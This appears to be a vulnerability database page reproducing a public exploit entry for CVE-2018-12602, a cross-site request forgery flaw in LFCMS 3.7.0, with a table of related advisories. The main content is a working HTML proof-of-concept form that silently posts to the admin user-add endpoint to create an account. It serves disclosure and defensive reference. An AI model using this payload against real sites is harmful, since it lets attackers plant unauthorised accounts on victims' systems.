| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| LFCMS 3.7.0 - Cross-Site Request Forgery (Add User) Vulnerability | 21 Jun 201800:00 | – | zdt | |
| LFCMS Cross-Site Request Forgery Vulnerability (CNVD-2018-14218) | 26 Jun 201800:00 | – | cnvd | |
| CVE-2018-12602 | 25 Jun 201815:00 | – | cve | |
| CVE-2018-12602 | 25 Jun 201815:00 | – | cvelist | |
| EUVD-2018-4561 | 7 Oct 202500:30 | – | euvd | |
| LFCMS 3.7.0 - Cross-Site Request Forgery (Add User) | 21 Jun 201800:00 | – | exploitpack | |
| CVE-2018-12602 | 25 Jun 201815:29 | – | nvd | |
| LFCMS 3.7.0 Cross Site Request Forgery | 21 Jun 201800:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 25 Jun 201815:29 | – | prion |
# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602
A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
The payload for attack is as follows.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
<input type="hidden" name="username" value="test222" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password" value="test222" />
<input type="hidden" name="repassword" value="test222" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation